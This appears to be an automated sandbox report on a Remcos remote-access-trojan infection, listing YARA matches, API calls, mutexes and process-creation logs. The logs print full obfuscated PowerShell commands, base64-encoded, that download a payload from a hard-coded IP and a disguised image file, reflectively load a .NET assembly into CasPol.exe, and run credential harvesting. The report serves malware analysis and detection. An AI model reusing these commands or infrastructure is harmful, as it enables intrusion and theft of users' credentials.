                      Source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: CasPol.exe PID: 6220, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@26/19@4/4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,11_2_004182CE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,10_2_00416AB7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,11_2_00418758
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,10_2_0040E219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,10_2_0041A64F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,10_2_00419BD4
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor[1].tiffJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-B3IX49
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4oam4pnr.lq0.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: HandleInformationJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: CasPol.exe, CasPol.exe, 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: CasPol.exe, CasPol.exe, 0000000C.00000002.2464075648.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: CasPol.exe, 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: CasPol.exe, CasPol.exe, 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: CasPol.exe, CasPol.exe, 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: CasPol.exe, CasPol.exe, 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: CasPol.exe, 0000000B.00000002.2479629117.0000000003001000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: CasPol.exe, CasPol.exe, 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: givenbestupdatedoingformebestthingswithgreatnewsformegive.htaVirustotal: Detection: 27%
                      Source: givenbestupdatedoingformebestthingswithgreatnewsformegive.htaReversingLabs: Detection: 13%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\givenbestupdatedoingformebestthingswithgreatnewsformegive.hta"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6126.tmp" "c:\Users\user\AppData\Local\Temp\brz1t20s\CSCB0966C08AE0149D5A4EAEA26C81DD572.TMP"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnaster
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\vgphuoqzklppcrzcpcvdcumi"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\giuruybtythumfngynhenhzrnto"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\iczknrmumbzhpljkqyugqmuiwagwoan"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\iczknrmumbzhpljkqyugqmuiwagwoan"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgIC